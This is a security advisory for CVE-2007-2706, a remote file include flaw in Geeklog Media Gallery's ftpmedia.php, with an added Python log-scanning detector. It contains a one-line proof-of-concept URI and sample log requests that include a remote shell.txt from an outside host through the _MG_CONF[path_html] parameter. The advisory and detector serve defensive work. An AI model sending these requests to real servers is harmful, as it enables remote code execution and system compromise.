Geeklog Media Gallery Ftpmedia.PHP Remote File Include Vulnerability
BID:23983
Info
| Bugtraq ID: | 23983 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-2706 |
| Remote: | Yes |
| Local: | No |
| Published: | May 14 2007 12:00AM |
| Updated: | May 07 2015 05:39PM |
| Credit: | ThE TiGeR is credited with the discovery of this vulnerability. |
| Vulnerable: | Geeklog Media Gallery 1.4, 1.4.1, 1.4.2, 1.4.3, 1.4.4, 1.4.5, 1.4.6, 1.4.7, 1.4.8a |
| Not Vulnerable: | Geeklog Media Gallery 1.4.8b |
Discussion
Geeklog Media Gallery is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Versions of Geeklog Media Gallery prior to 1.4.8b are vulnerable.
Exploit / POC
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://example.com/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= shell.txt?
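The parameter in the proof-of-concept, `_MG_CONF[path_html]`, is a server-side configuration value that a client should never be able to set. The following detection routine, added here and not part of the original advisory, scans constructed Apache-style access-log lines for requests to ftpmedia.php that carry any `_MG_CONF[...]` key and escalates the verdict when the supplied value is a URL with a scheme (the remote-include pattern). The log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined format); not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [14/May/2007:10:01:02 +0000] "GET /mediagallery/public_html/maint/ftpmedia.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [14/May/2007:10:02:17 +0000] "GET /mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://198.51.100.7/shell.txt? HTTP/1.1" 200 731 "-" "curl/7.15"
203.0.113.9 - - [14/May/2007:10:02:40 +0000] "GET /mediagallery/public_html/maint/ftpmedia.php?_MG_CONF%5Bpath_html%5D=ftp://198.51.100.7/x.txt%3F HTTP/1.1" 200 731 "-" "curl/7.15"
203.0.113.12 - - [14/May/2007:10:03:01 +0000] "GET /mediagallery/public_html/index.php?album=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Request line inside the quotes: method, target, protocol.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A value beginning with a URL scheme (http://, ftp://, ...) is the remote-include shape.
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)


def classify(line):
    """Return None, "config-override" or "remote-include" for one access-log line."""
    m = REQ_RE.search(line)
    if not m:
        return None
    parsed = urlparse(m.group("target"))
    if not parsed.path.lower().endswith("/ftpmedia.php"):
        return None
    # parse_qs percent-decodes keys, so _MG_CONF%5Bpath_html%5D matches as well.
    params = parse_qs(parsed.query, keep_blank_values=True)
    values = [v for k, vs in params.items() if k.startswith("_MG_CONF[") for v in vs]
    if not values:
        return None
    # Any client-supplied _MG_CONF[...] key is an attempt to override server config;
    # a scheme-prefixed value is the remote file include pattern this advisory describes.
    if any(REMOTE_RE.match(v) for v in values):
        return "remote-include"
    return "config-override"


def scan(log_text):
    """Return [(line_number, verdict)] for every flagged line in the log text."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits


if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

Run against real logs, a "config-override" hit on a patched install is still worth investigating, since the parameter has no legitimate client-side use.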
Solution / Fix
Solution:
The vendor has released version 1.4.8b to address these issues. Please see the references for more information.
Affected versions and fix:
- Geeklog Media Gallery 1.4, 1.4.1, 1.4.2, 1.4.3, 1.4.4, 1.4.5, 1.4.6, 1.4.7, 1.4.8a: Geeklog mediagallery-1.4.8b-1.3.11.tar.gz, http://www.gllabs.org/filemgmt/visit.php?lid=115
References
References:
- Media Gallery Homepage (Geeklog)
- Security Vulnerability in Media Gallery v1.4x (Geeklog)